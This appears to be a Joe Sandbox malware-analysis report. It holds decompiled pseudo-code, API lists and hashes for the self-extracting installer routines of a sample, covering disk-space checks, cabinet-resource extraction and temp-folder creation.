                            control_flow_graph 324 94597d-9459b9 GetCurrentDirectoryA SetCurrentDirectoryA 325 9459dd-945a1b GetDiskFreeSpaceA 324->325 326 9459bb-9459d8 call 9444b9 call 946285 324->326 328 945ba1-945bde memset call 946285 GetLastError FormatMessageA 325->328 329 945a21-945a4a MulDiv 325->329 345 945c05-945c14 call 946ce0 326->345 337 945be3-945bfc call 9444b9 SetCurrentDirectoryA 328->337 329->328 332 945a50-945a6c GetVolumeInformationA 329->332 335 945ab5-945aca SetCurrentDirectoryA 332->335 336 945a6e-945ab0 memset call 946285 GetLastError FormatMessageA 332->336 339 945acc-945ad1 335->339 336->337 351 945c02 337->351 343 945ae2-945ae4 339->343 344 945ad3-945ad8 339->344 349 945ae6 343->349 350 945ae7-945af8 343->350 344->343 347 945ada-945ae0 344->347 347->339 347->343 349->350 353 945af9-945afb 350->353 354 945c04 351->354 355 945b05-945b08 353->355 356 945afd-945b03 353->356 354->345 357 945b20-945b27 355->357 358 945b0a-945b1b call 9444b9 355->358 356->353 356->355 359 945b52-945b5b 357->359 360 945b29-945b33 357->360 358->351 363 945b62-945b6d 359->363 360->359 362 945b35-945b50 360->362 362->363 365 945b76-945b7d 363->365 366 945b6f-945b74 363->366 368 945b83 365->368 369 945b7f-945b81 365->369 367 945b85 366->367 370 945b96-945b9f 367->370 371 945b87-945b94 call 94268b 367->371 368->367 369->367 370->354 371->354
                            C-Code - Quality: 96%
                            			E0094597D(CHAR* __ecx, signed char __edx, void* __edi, intOrPtr _a4) {
                            				signed int _v8;
                            				char _v16;
                            				char _v276;
                            				char _v788;
                            				long _v792;
                            				long _v796;
                            				long _v800;
                            				signed int _v804;
                            				long _v808;
                            				int _v812;
                            				long _v816;
                            				long _v820;
                            				void* __ebx;
                            				void* __esi;
                            				signed int _t46;
                            				int _t50;
                            				signed int _t55;
                            				void* _t66;
                            				int _t69;
                            				signed int _t73;
                            				signed short _t78;
                            				signed int _t87;
                            				signed int _t101;
                            				int _t102;
                            				unsigned int _t103;
                            				unsigned int _t105;
                            				signed int _t111;
                            				long _t112;
                            				signed int _t116;
                            				CHAR* _t118;
                            				signed int _t119;
                            				signed int _t120;
                            
                            				_t114 = __edi;
                            				_t46 =  *0x948004; // 0xec518a5e
                            				_v8 = _t46 ^ _t120;
                            				_v804 = __edx;
                            				_t118 = __ecx;
                            				GetCurrentDirectoryA(0x104,  &_v276);
                            				_t50 = SetCurrentDirectoryA(_t118); // executed
                            				if(_t50 != 0) {
                            					_push(__edi);
                            					_v796 = 0;
                            					_v792 = 0;
                            					_v800 = 0;
                            					_v808 = 0;
                            					_t55 = GetDiskFreeSpaceA(0,  &_v796,  &_v792,  &_v800,  &_v808); // executed
                            					__eflags = _t55;
                            					if(_t55 == 0) {
                            						L29:
                            						memset( &_v788, 0, 0x200);
                            						 *0x949124 = E00946285();
                            						FormatMessageA(0x1000, 0, GetLastError(), 0,  &_v788, 0x200, 0);
                            						_t110 = 0x4b0;
                            						L30:
                            						__eflags = 0;
                            						E009444B9(0, _t110, _t118,  &_v788, 0x10, 0);
                            						SetCurrentDirectoryA( &_v276);
                            						L31:
                            						_t66 = 0;
                            						__eflags = 0;
                            						L32:
                            						_pop(_t114);
                            						goto L33;
                            					}
                            					_t69 = _v792 * _v796;
                            					_v812 = _t69;
                            					_t116 = MulDiv(_t69, _v800, 0x400);
                            					__eflags = _t116;
                            					if(_t116 == 0) {
                            						goto L29;
                            					}
                            					_t73 = GetVolumeInformationA(0, 0, 0, 0,  &_v820,  &_v816, 0, 0); // executed
                            					__eflags = _t73;
                            					if(_t73 != 0) {
                            						SetCurrentDirectoryA( &_v276); // executed
                            						_t101 =  &_v16;
                            						_t111 = 6;
                            						_t119 = _t118 - _t101;
                            						__eflags = _t119;
                            						while(1) {
                            							_t22 = _t111 - 4; // 0x2
                            							__eflags = _t22;
                            							if(_t22 == 0) {
                            								break;
                            							}
                            							_t87 =  *((intOrPtr*)(_t119 + _t101));
                            							__eflags = _t87;
                            							if(_t87 == 0) {
                            								break;
                            							}
                            							 *_t101 = _t87;
                            							_t101 = _t101 + 1;
                            							_t111 = _t111 - 1;
                            							__eflags = _t111;
                            							if(_t111 != 0) {
                            								continue;
                            							}
                            							break;
                            						}
                            						__eflags = _t111;
                            						if(_t111 == 0) {
                            							_t101 = _t101 - 1;
                            							__eflags = _t101;
                            						}
                            						 *_t101 = 0;
                            						_t112 = 0x200;
                            						_t102 = _v812;
                            						_t78 = 0;
                            						_t118 = 8;
                            						while(1) {
                            							__eflags = _t102 - _t112;
                            							if(_t102 == _t112) {
                            								break;
                            							}
                            							_t112 = _t112 + _t112;
                            							_t78 = _t78 + 1;
                            							__eflags = _t78 - _t118;
                            							if(_t78 < _t118) {
                            								continue;
                            							}
                            							break;
                            						}
                            						__eflags = _t78 - _t118;
                            						if(_t78 != _t118) {
                            							__eflags =  *0x949a34 & 0x00000008;
                            							if(( *0x949a34 & 0x00000008) == 0) {
                            								L20:
                            								_t103 =  *0x949a38; // 0x0
                            								_t110 =  *((intOrPtr*)(0x9489e0 + (_t78 & 0x0000ffff) * 4));
                            								L21:
                            								__eflags = (_v804 & 0x00000003) - 3;
                            								if((_v804 & 0x00000003) != 3) {
                            									__eflags = _v804 & 0x00000001;
                            									if((_v804 & 0x00000001) == 0) {
                            										__eflags = _t103 - _t116;
                            									} else {
                            										__eflags = _t110 - _t116;
                            									}
                            								} else {
                            									__eflags = _t103 + _t110 - _t116;
                            								}
                            								if(__eflags <= 0) {
                            									 *0x949124 = 0;
                            									_t66 = 1;
                            								} else {
                            									_t66 = E0094268B(_a4, _t110, _t103,  &_v16);
                            								}
                            								goto L32;
                            							}
                            							__eflags = _v816 & 0x00008000;
                            							if((_v816 & 0x00008000) == 0) {
                            								goto L20;
                            							}
                            							_t105 =  *0x949a38; // 0x0
                            							_t110 =  *((intOrPtr*)(0x9489e0 + (_t78 & 0x0000ffff) * 4)) +  *((intOrPtr*)(0x9489e0 + (_t78 & 0x0000ffff) * 4));
                            							_t103 = (_t105 >> 2) +  *0x949a38;
                            							goto L21;
                            						}
                            						_t110 = 0x4c5;
                            						E009444B9(0, 0x4c5, 0, 0, 0x10, 0);
                            						goto L31;
                            					}
                            					memset( &_v788, 0, 0x200);
                            					 *0x949124 = E00946285();
                            					FormatMessageA(0x1000, 0, GetLastError(), 0,  &_v788, 0x200, 0);
                            					_t110 = 0x4f9;
                            					goto L30;
                            				} else {
                            					_t110 = 0x4bc;
                            					E009444B9(0, 0x4bc, 0, 0, 0x10, 0);
                            					 *0x949124 = E00946285();
                            					_t66 = 0;
                            					L33:
                            					return E00946CE0(_t66, 0, _v8 ^ _t120, _t110, _t114, _t118);
                            				}
                            			}



































                            0x0094597d
                            0x00945988
                            0x0094598f
                            0x0094599a
                            0x009459a6
                            0x009459a8
                            0x009459af
                            0x009459b9
                            0x009459dd
                            0x009459e4
                            0x009459f1
                            0x009459fe
                            0x00945a0b
                            0x00945a13
                            0x00945a19
                            0x00945a1b
                            0x00945ba1
                            0x00945baf
                            0x00945bbd
                            0x00945bd8
                            0x00945bde
                            0x00945be3
                            0x00945bec
                            0x00945bf0
                            0x00945bfc
                            0x00945c02
                            0x00945c02
                            0x00945c02
                            0x00945c04
                            0x00945c04
                            0x00000000
                            0x00945c04
                            0x00945a27
                            0x00945a3a
                            0x00945a46
                            0x00945a48
                            0x00945a4a
                            0x00000000
                            0x00000000
                            0x00945a64
                            0x00945a6a
                            0x00945a6c
                            0x00945abc
                            0x00945ac2
                            0x00945ac9
                            0x00945aca
                            0x00945aca
                            0x00945acc
                            0x00945acc
                            0x00945acf
                            0x00945ad1
                            0x00000000
                            0x00000000
                            0x00945ad3
                            0x00945ad6
                            0x00945ad8
                            0x00000000
                            0x00000000
                            0x00945ada
                            0x00945adc
                            0x00945add
                            0x00945add
                            0x00945ae0
                            0x00000000
                            0x00000000
                            0x00000000
                            0x00945ae0
                            0x00945ae2
                            0x00945ae4
                            0x00945ae6
                            0x00945ae6
                            0x00945ae6
                            0x00945ae9
                            0x00945aeb
                            0x00945af0
                            0x00945af6
                            0x00945af8
                            0x00945af9
                            0x00945af9
                            0x00945afb
                            0x00000000
                            0x00000000
                            0x00945afd
                            0x00945aff
                            0x00945b00
                            0x00945b03
                            0x00000000
                            0x00000000
                            0x00000000
                            0x00945b03
                            0x00945b05
                            0x00945b08
                            0x00945b20
                            0x00945b27
                            0x00945b52
                            0x00945b52
                            0x00945b5b
                            0x00945b62
                            0x00945b6b
                            0x00945b6d
                            0x00945b76
                            0x00945b7d
                            0x00945b83
                            0x00945b7f
                            0x00945b7f
                            0x00945b7f
                            0x00945b6f
                            0x00945b72
                            0x00945b72
                            0x00945b85
                            0x00945b98
                            0x00945b9e
                            0x00945b87
                            0x00945b8f
                            0x00945b8f
                            0x00000000
                            0x00945b85
                            0x00945b29
                            0x00945b33
                            0x00000000
                            0x00000000
                            0x00945b35
                            0x00945b48
                            0x00945b4a
                            0x00000000
                            0x00945b4a
                            0x00945b0f
                            0x00945b16
                            0x00000000
                            0x00945b16
                            0x00945a7c
                            0x00945a8a
                            0x00945aa5
                            0x00945aab
                            0x00000000
                            0x009459bb
                            0x009459c0
                            0x009459c7
                            0x009459d1
                            0x009459d6
                            0x00945c05
                            0x00945c14
                            0x00945c14

                            APIs
                            • GetCurrentDirectoryA.KERNEL32(00000104,?,00000000,00000000), ref: 009459A8
                            • SetCurrentDirectoryA.KERNELBASE(?), ref: 009459AF
                            • GetDiskFreeSpaceA.KERNELBASE(00000000,?,?,?,?,00000001), ref: 00945A13
                            • MulDiv.KERNEL32(?,?,00000400), ref: 00945A40
                            • GetVolumeInformationA.KERNELBASE(00000000,00000000,00000000,00000000,?,?,00000000,00000000), ref: 00945A64
                            • memset.MSVCRT ref: 00945A7C
                            • GetLastError.KERNEL32(00000000,?,00000200,00000000), ref: 00945A98
                            • FormatMessageA.KERNEL32(00001000,00000000,00000000), ref: 00945AA5
                            • SetCurrentDirectoryA.KERNEL32(?,?,?,00000010,00000000), ref: 00945BFC
                              • Part of subcall function 009444B9: LoadStringA.USER32(000004B1,?,00000200,00000000), ref: 00944518
                              • Part of subcall function 009444B9: MessageBoxA.USER32(?,?,lenta,00010010), ref: 00944554
                              • Part of subcall function 00946285: GetLastError.KERNEL32(00945BBC), ref: 00946285
                            Memory Dump Source
                            • Source File: 00000001.00000002.315389196.0000000000941000.00000020.00000001.01000000.00000004.sdmp, Offset: 00940000, based on PE: true
                            • Associated: 00000001.00000002.315383961.0000000000940000.00000002.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000001.00000002.315400088.0000000000948000.00000004.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000001.00000002.315411950.000000000094A000.00000002.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000001.00000002.315411950.000000000094C000.00000002.00000001.01000000.00000004.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_1_2_940000_bfCg.jbxd
                            Similarity
                            • API ID: CurrentDirectory$ErrorLastMessage$DiskFormatFreeInformationLoadSpaceStringVolumememset
                            • String ID:
                            • API String ID: 4237285672-0
                            • Opcode ID: ebc552df4301a7ae9ca12e62eff3d1f81838d83cda4e3ffe2a36ba323641255b
                            • Instruction ID: db0f5a25b9a9d403e29a7aefa5191673ec0d1b2c8b558c5423776099b5806faf
                            • Opcode Fuzzy Hash: ebc552df4301a7ae9ca12e62eff3d1f81838d83cda4e3ffe2a36ba323641255b
                            • Instruction Fuzzy Hash: BF71C1B591420CAFEB25DFA0CC85FFB77ACEB49304F0545A9F445D2141EA748E84CB21
                            Uniqueness

                            Uniqueness Score: -1.00%

                            Control-flow Graph

                            • Executed
                            • Not Executed
                            control_flow_graph 374 944fe0-94501a call 94468f FindResourceA LoadResource LockResource 377 945020-945027 374->377 378 945161-945163 374->378 379 945057-94505e call 944efd 377->379 380 945029-945051 GetDlgItem ShowWindow GetDlgItem ShowWindow 377->380 383 945060-945077 call 9444b9 379->383 384 94507c-9450b4 379->384 380->379 388 945107-94510e 383->388 389 9450b6-9450da 384->389 390 9450e8-945104 call 9444b9 384->390 392 945110-945117 FreeResource 388->392 393 94511d-94511f 388->393 398 945106 389->398 402 9450dc 389->402 390->398 392->393 395 945121-945127 393->395 396 94513a-945141 393->396 395->396 399 945129-945135 call 9444b9 395->399 400 945143-94514a 396->400 401 94515f 396->401 398->388 399->396 400->401 404 94514c-945159 SendMessageA 400->404 401->378 405 9450e3-9450e6 402->405 404->401 405->390 405->398
                            C-Code - Quality: 77%
                            			E00944FE0(void* __edi, void* __eflags) {
                            				void* __ebx;
                            				void* _t8;
                            				struct HWND__* _t9;
                            				int _t10;
                            				void* _t12;
                            				struct HWND__* _t24;
                            				struct HWND__* _t27;
                            				intOrPtr _t29;
                            				void* _t33;
                            				int _t34;
                            				CHAR* _t36;
                            				int _t37;
                            				intOrPtr _t47;
                            
                            				_t33 = __edi;
                            				_t36 = "CABINET";
                            				 *0x949144 = E0094468F(_t36, 0, 0);
                            				_t8 = LockResource(LoadResource(0, FindResourceA(0, _t36, 0xa)));
                            				 *0x949140 = _t8;
                            				if(_t8 == 0) {
                            					return _t8;
                            				}
                            				_t9 =  *0x948584; // 0x0
                            				if(_t9 != 0) {
                            					ShowWindow(GetDlgItem(_t9, 0x842), 0);
                            					ShowWindow(GetDlgItem( *0x948584, 0x841), 5); // executed
                            				}
                            				_t10 = E00944EFD(0, 0); // executed
                            				if(_t10 != 0) {
                            					__imp__#20(E00944CA0, E00944CC0, E00944980, E00944A50, E00944AD0, E00944B60, E00944BC0, 1, 0x949148, _t33);
                            					_t34 = _t10;
                            					if(_t34 == 0) {
                            						L8:
                            						_t29 =  *0x949148; // 0x0
                            						_t24 =  *0x948584; // 0x0
                            						E009444B9(_t24, _t29 + 0x514, 0, 0, 0x10, 0);
                            						_t37 = 0;
                            						L9:
                            						goto L10;
                            					}
                            					__imp__#22(_t34, "*MEMCAB", 0x941140, 0, E00944CD0, 0, 0x949140); // executed
                            					_t37 = _t10;
                            					if(_t37 == 0) {
                            						goto L9;
                            					}
                            					__imp__#23(_t34); // executed
                            					if(_t10 != 0) {
                            						goto L9;
                            					}
                            					goto L8;
                            				} else {
                            					_t27 =  *0x948584; // 0x0
                            					E009444B9(_t27, 0x4ba, 0, 0, 0x10, 0);
                            					_t37 = 0;
                            					L10:
                            					_t12 =  *0x949140; // 0x0
                            					if(_t12 != 0) {
                            						FreeResource(_t12);
                            						 *0x949140 = 0;
                            					}
                            					if(_t37 == 0) {
                            						_t47 =  *0x9491d8; // 0x0
                            						if(_t47 == 0) {
                            							E009444B9(0, 0x4f8, 0, 0, 0x10, 0);
                            						}
                            					}
                            					if(( *0x948a38 & 0x00000001) == 0 && ( *0x949a34 & 0x00000001) == 0) {
                            						SendMessageA( *0x948584, 0xfa1, _t37, 0);
                            					}
                            					return _t37;
                            				}
                            			}
















                            0x00944fe0
                            0x00944fe6
                            0x00944ff9
                            0x0094500d
                            0x00945013
                            0x0094501a
                            0x00945163
                            0x00945163
                            0x00945020
                            0x00945027
                            0x00945037
                            0x00945051
                            0x00945051
                            0x00945057
                            0x0094505e
                            0x009450a7
                            0x009450ad
                            0x009450b4
                            0x009450e8
                            0x009450e8
                            0x009450ee
                            0x009450ff
                            0x00945104
                            0x00945106
                            0x00000000
                            0x00945106
                            0x009450cd
                            0x009450d3
                            0x009450da
                            0x00000000
                            0x00000000
                            0x009450dd
                            0x009450e6
                            0x00000000
                            0x00000000
                            0x00000000
                            0x00945060
                            0x00945060
                            0x00945070
                            0x00945075
                            0x00945107
                            0x00945107
                            0x0094510e
                            0x00945111
                            0x00945117
                            0x00945117
                            0x0094511f
                            0x00945121
                            0x00945127
                            0x00945135
                            0x00945135
                            0x00945127
                            0x00945141
                            0x00945159
                            0x00945159
                            0x00000000
                            0x0094515f

                            APIs
                              • Part of subcall function 0094468F: FindResourceA.KERNEL32(00000000,TITLE,0000000A), ref: 009446A0
                              • Part of subcall function 0094468F: SizeofResource.KERNEL32(00000000,00000000,?,00942D1A,0000007F,?,?,?,?,?,?,?,00000002,00000000), ref: 009446A9
                              • Part of subcall function 0094468F: FindResourceA.KERNEL32(00000000,TITLE,0000000A), ref: 009446C3
                              • Part of subcall function 0094468F: LoadResource.KERNEL32(00000000,00000000,?,00942D1A,0000007F,?,?,?,?,?,?,?,00000002,00000000), ref: 009446CC
                              • Part of subcall function 0094468F: LockResource.KERNEL32(00000000,?,00942D1A,0000007F,?,?,?,?,?,?,?,00000002,00000000), ref: 009446D3
                              • Part of subcall function 0094468F: memcpy_s.MSVCRT ref: 009446E5
                              • Part of subcall function 0094468F: FreeResource.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,00000002,00000000), ref: 009446EF
                            • FindResourceA.KERNEL32(00000000,CABINET,0000000A), ref: 00944FFE
                            • LoadResource.KERNEL32(00000000,00000000), ref: 00945006
                            • LockResource.KERNEL32(00000000), ref: 0094500D
                            • GetDlgItem.USER32(00000000,00000842), ref: 00945030
                            • ShowWindow.USER32(00000000), ref: 00945037
                            • GetDlgItem.USER32(00000841,00000005), ref: 0094504A
                            • ShowWindow.USER32(00000000), ref: 00945051
                            • FreeResource.KERNEL32(00000000,00000000,00000010,00000000), ref: 00945111
                            • SendMessageA.USER32(00000FA1,00000000,00000000,00000000), ref: 00945159
                            Strings
                            Memory Dump Source
                            • Source File: 00000001.00000002.315389196.0000000000941000.00000020.00000001.01000000.00000004.sdmp, Offset: 00940000, based on PE: true
                            • Associated: 00000001.00000002.315383961.0000000000940000.00000002.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000001.00000002.315400088.0000000000948000.00000004.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000001.00000002.315411950.000000000094A000.00000002.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000001.00000002.315411950.000000000094C000.00000002.00000001.01000000.00000004.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_1_2_940000_bfCg.jbxd
                            Similarity
                            • API ID: Resource$Find$FreeItemLoadLockShowWindow$MessageSendSizeofmemcpy_s
                            • String ID: *MEMCAB$CABINET
                            • API String ID: 1305606123-2642027498
                            • Opcode ID: e0be1ea5cedb66f89c432dd8a49b5c179aa3342aba62c38fcfda91e270a20842
                            • Instruction ID: e11108dce719a20755720ee7a271b59f746d9c335174fa6af3dd11286c03e7ab
                            • Opcode Fuzzy Hash: e0be1ea5cedb66f89c432dd8a49b5c179aa3342aba62c38fcfda91e270a20842
                            • Instruction Fuzzy Hash: 193107B879C7017FE7305BA1AC89F6B379CA78FB4DF050024F901A21A2DAB4CC00A665
                            Uniqueness

                            Uniqueness Score: -1.00%

                            Control-flow Graph

                            C-Code - Quality: 95%
                            			E009453A1(CHAR* __ecx, CHAR* __edx) {
                            				signed int _v8;
                            				char _v268;
                            				void* __ebx;
                            				void* __edi;
                            				void* __esi;
                            				signed int _t5;
                            				long _t13;
                            				int _t14;
                            				CHAR* _t20;
                            				int _t29;
                            				int _t30;
                            				CHAR* _t32;
                            				signed int _t33;
                            				void* _t34;
                            
                            				_t5 =  *0x948004; // 0xec518a5e
                            				_v8 = _t5 ^ _t33;
                            				_t32 = __edx;
                            				_t20 = __ecx;
                            				_t29 = 0;
                            				while(1) {
                            					E0094171E( &_v268, 0x104, "IXP%03d.TMP", _t29);
                            					_t34 = _t34 + 0x10;
                            					_t29 = _t29 + 1;
                            					E00941680(_t32, 0x104, _t20);
                            					E0094658A(_t32, 0x104,  &_v268); // executed
                            					RemoveDirectoryA(_t32); // executed
                            					_t13 = GetFileAttributesA(_t32); // executed
                            					if(_t13 == 0xffffffff) {
                            						break;
                            					}
                            					if(_t29 < 0x190) {
                            						continue;
                            					}
                            					L3:
                            					_t30 = 0;
                            					if(GetTempFileNameA(_t20, "IXP", 0, _t32) != 0) {
                            						_t30 = 1;
                            						DeleteFileA(_t32);
                            						CreateDirectoryA(_t32, 0);
                            					}
                            					L5:
                            					return E00946CE0(_t30, _t20, _v8 ^ _t33, 0x104, _t30, _t32);
                            				}
                            				_t14 = CreateDirectoryA(_t32, 0); // executed
                            				if(_t14 == 0) {
                            					goto L3;
                            				}
                            				_t30 = 1;
                            				 *0x948a20 = 1;
                            				goto L5;
                            			}

















                            0x009453ac
                            0x009453b3
                            0x009453b9
                            0x009453bb
                            0x009453bd
                            0x009453bf
                            0x009453d1
                            0x009453d6
                            0x009453e0
                            0x009453e2
                            0x009453f5
                            0x009453fb
                            0x00945402
                            0x0094540b
                            0x00000000
                            0x00000000
                            0x00945413
                            0x00000000
                            0x00000000
                            0x00945415
                            0x00945416
                            0x00945427
                            0x0094542a
                            0x0094542b
                            0x00945434
                            0x00945434
                            0x0094543a
                            0x0094544c
                            0x0094544c
                            0x00945452
                            0x0094545a
                            0x00000000
                            0x00000000
                            0x0094545e
                            0x0094545f
                            0x00000000

                            APIs
                              • Part of subcall function 0094171E: _vsnprintf.MSVCRT ref: 00941750
                            • RemoveDirectoryA.KERNELBASE(?,?,C:\Users\user\AppData\Local\Temp\IXP001.TMP\,?,00000001,C:\Users\user\AppData\Local\Temp\IXP001.TMP\,00000000), ref: 009453FB
                            • GetFileAttributesA.KERNELBASE(?,?,00000001,C:\Users\user\AppData\Local\Temp\IXP001.TMP\,00000000), ref: 00945402
                            • GetTempFileNameA.KERNEL32(C:\Users\user\AppData\Local\Temp\IXP001.TMP\,IXP,00000000,?,?,00000001,C:\Users\user\AppData\Local\Temp\IXP001.TMP\,00000000), ref: 0094541F
                            • DeleteFileA.KERNEL32(?,?,00000001,C:\Users\user\AppData\Local\Temp\IXP001.TMP\,00000000), ref: 0094542B
                            • CreateDirectoryA.KERNEL32(?,00000000,?,00000001,C:\Users\user\AppData\Local\Temp\IXP001.TMP\,00000000), ref: 00945434
                            • CreateDirectoryA.KERNELBASE(?,00000000,?,00000001,C:\Users\user\AppData\Local\Temp\IXP001.TMP\,00000000), ref: 00945452
                            Strings
                            Memory Dump Source
                            • Source File: 00000001.00000002.315389196.0000000000941000.00000020.00000001.01000000.00000004.sdmp, Offset: 00940000, based on PE: true
                            • Associated: 00000001.00000002.315383961.0000000000940000.00000002.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000001.00000002.315400088.0000000000948000.00000004.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000001.00000002.315411950.000000000094A000.00000002.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000001.00000002.315411950.000000000094C000.00000002.00000001.01000000.00000004.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_1_2_940000_bfCg.jbxd
                            Similarity
                            • API ID: DirectoryFile$Create$AttributesDeleteNameRemoveTemp_vsnprintf
                            • String ID: C:\Users\user\AppData\Local\Temp\IXP001.TMP\$IXP$IXP%03d.TMP
                            • API String ID: 1082909758-2414463295
                            • Opcode ID: 97dccd76411d3a89dde376f99a271563767ae54f76567e350a70ba032ff512a0
                            • Instruction ID: 5a1129eb548aa29d9629030b74766fcc58e8abd2f07fb575acfe30c04a4988b9
                            • Opcode Fuzzy Hash: 97dccd76411d3a89dde376f99a271563767ae54f76567e350a70ba032ff512a0
                            • Instruction Fuzzy Hash: 2611207535860467E320AF769C49FEF376DEFC7321F000129F646D22A1CE748D8286A2
                            Uniqueness

                            Uniqueness Score: -1.00%

                            Control-flow Graph

                            • Executed
                            • Not Executed
                            control_flow_graph 478 945467-945484 479 94551c-945528 call 941680 478->479 480 94548a-945490 call 9453a1 478->480 484 94552d-945539 call 9458c8 479->484 483 945495-945497 480->483 485 945581-945583 483->485 486 94549d-9454c0 call 941781 483->486 493 94554d-945552 484->493 494 94553b-945545 CreateDirectoryA 484->494 488 94558d-94559d call 946ce0 485->488 495 9454c2-9454d8 GetSystemInfo 486->495 496 94550c-94551a call 94658a 486->496 500 945554-945557 call 94597d 493->500 501 945585-94558b 493->501 498 945577-94557c call 946285 494->498 499 945547 494->499 504 9454fe 495->504 505 9454da-9454dd 495->505 496->484 498->485 499->493 511 94555c-94555e 500->511 501->488 512 945503-945507 call 94658a 504->512 509 9454f7-9454fc 505->509 510 9454df-9454e2 505->510 509->512 513 9454e4-9454e7 510->513 514 9454f0-9454f5 510->514 511->501 515 945560-945566 511->515 512->496 513->496 517 9454e9-9454ee 513->517 514->512 515->485 518 945568-945575 RemoveDirectoryA 515->518 517->512 518->485
                            C-Code - Quality: 75%
                            			E00945467(CHAR* __ecx, void* __edx, char* _a4) {
                            				signed int _v8;
                            				char _v268;
                            				struct _SYSTEM_INFO _v304;
                            				void* __ebx;
                            				void* __edi;
                            				void* __esi;
                            				signed int _t10;
                            				void* _t13;
                            				intOrPtr _t14;
                            				void* _t16;
                            				void* _t20;
                            				signed int _t26;
                            				void* _t28;
                            				void* _t29;
                            				CHAR* _t48;
                            				signed int _t49;
                            				intOrPtr _t61;
                            
                            				_t10 =  *0x948004; // 0xec518a5e
                            				_v8 = _t10 ^ _t49;
                            				_push(__ecx);
                            				if(__edx == 0) {
                            					_t48 = 0x9491e4;
                            					_t42 = 0x104;
                            					E00941680(0x9491e4, 0x104);
                            					L14:
                            					_t13 = E009458C8(_t48); // executed
                            					if(_t13 != 0) {
                            						L17:
                            						_t42 = _a4;
                            						if(_a4 == 0) {
                            							L23:
                            							 *0x949124 = 0;
                            							_t14 = 1;
                            							L24:
                            							return E00946CE0(_t14, 0, _v8 ^ _t49, _t42, 1, _t48);
                            						}
                            						_t16 = E0094597D(_t48, _t42, 1, 0); // executed
                            						if(_t16 != 0) {
                            							goto L23;
                            						}
                            						_t61 =  *0x948a20; // 0x0
                            						if(_t61 != 0) {
                            							 *0x948a20 = 0;
                            							RemoveDirectoryA(_t48);
                            						}
                            						L22:
                            						_t14 = 0;
                            						goto L24;
                            					}
                            					if(CreateDirectoryA(_t48, 0) == 0) {
                            						 *0x949124 = E00946285();
                            						goto L22;
                            					}
                            					 *0x948a20 = 1;
                            					goto L17;
                            				}
                            				_t42 =  &_v268;
                            				_t20 = E009453A1(__ecx,  &_v268); // executed
                            				if(_t20 == 0) {
                            					goto L22;
                            				}
                            				_push(__ecx);
                            				_t48 = 0x9491e4;
                            				E00941781(0x9491e4, 0x104, __ecx,  &_v268);
                            				if(( *0x949a34 & 0x00000020) == 0) {
                            					L12:
                            					_t42 = 0x104;
                            					E0094658A(_t48, 0x104, 0x941140);
                            					goto L14;
                            				}
                            				GetSystemInfo( &_v304);
                            				_t26 = _v304.dwOemId & 0x0000ffff;
                            				if(_t26 == 0) {
                            					_push("i386");
                            					L11:
                            					E0094658A(_t48, 0x104);
                            					goto L12;
                            				}
                            				_t28 = _t26 - 1;
                            				if(_t28 == 0) {
                            					_push("mips");
                            					goto L11;
                            				}
                            				_t29 = _t28 - 1;
                            				if(_t29 == 0) {
                            					_push("alpha");
                            					goto L11;
                            				}
                            				if(_t29 != 1) {
                            					goto L12;
                            				}
                            				_push("ppc");
                            				goto L11;
                            			}




















                            0x00945472
                            0x00945479
                            0x00945481
                            0x00945484
                            0x0094551c
                            0x00945521
                            0x00945528
                            0x0094552d
                            0x0094552f
                            0x00945539
                            0x0094554d
                            0x0094554d
                            0x00945552
                            0x00945585
                            0x00945585
                            0x0094558b
                            0x0094558d
                            0x0094559d
                            0x0094559d
                            0x00945557
                            0x0094555e
                            0x00000000
                            0x00000000
                            0x00945560
                            0x00945566
                            0x00945569
                            0x0094556f
                            0x0094556f
                            0x00945581
                            0x00945581
                            0x00000000
                            0x00945581
                            0x00945545
                            0x0094557c
                            0x00000000
                            0x0094557c
                            0x00945547
                            0x00000000
                            0x00945547
                            0x0094548a
                            0x00945490
                            0x00945497
                            0x00000000
                            0x00000000
                            0x0094549d
                            0x009454ab
                            0x009454b4
                            0x009454c0
                            0x0094550c
                            0x00945511
                            0x00945515
                            0x00000000
                            0x00945515
                            0x009454c9
                            0x009454d6
                            0x009454d8
                            0x009454fe
                            0x00945503
                            0x00945507
                            0x00000000
                            0x00945507
                            0x009454da
                            0x009454dd
                            0x009454f7
                            0x00000000
                            0x009454f7
                            0x009454df
                            0x009454e2
                            0x009454f0
                            0x00000000
                            0x009454f0
                            0x009454e7
                            0x00000000
                            0x00000000
                            0x009454e9
                            0x00000000

                            APIs
                            • GetSystemInfo.KERNEL32(?,?,?,?,C:\Users\user\AppData\Local\Temp\IXP001.TMP\,00000001,C:\Users\user\AppData\Local\Temp\IXP001.TMP\,00000000), ref: 009454C9
                            • CreateDirectoryA.KERNEL32(C:\Users\user\AppData\Local\Temp\IXP001.TMP\,00000000,C:\Users\user\AppData\Local\Temp\IXP001.TMP\,00000001,C:\Users\user\AppData\Local\Temp\IXP001.TMP\,00000000), ref: 0094553D
                            • RemoveDirectoryA.KERNEL32(C:\Users\user\AppData\Local\Temp\IXP001.TMP\,00000000,C:\Users\user\AppData\Local\Temp\IXP001.TMP\,00000001,C:\Users\user\AppData\Local\Temp\IXP001.TMP\,00000000), ref: 0094556F
                              • Part of subcall function 009453A1: RemoveDirectoryA.KERNELBASE(?,?,C:\Users\user\AppData\Local\Temp\IXP001.TMP\,?,00000001,C:\Users\user\AppData\Local\Temp\IXP001.TMP\,00000000), ref: 009453FB
                              • Part of subcall function 009453A1: GetFileAttributesA.KERNELBASE(?,?,00000001,C:\Users\user\AppData\Local\Temp\IXP001.TMP\,00000000), ref: 00945402
                              • Part of subcall function 009453A1: GetTempFileNameA.KERNEL32(C:\Users\user\AppData\Local\Temp\IXP001.TMP\,IXP,00000000,?,?,00000001,C:\Users\user\AppData\Local\Temp\IXP001.TMP\,00000000), ref: 0094541F
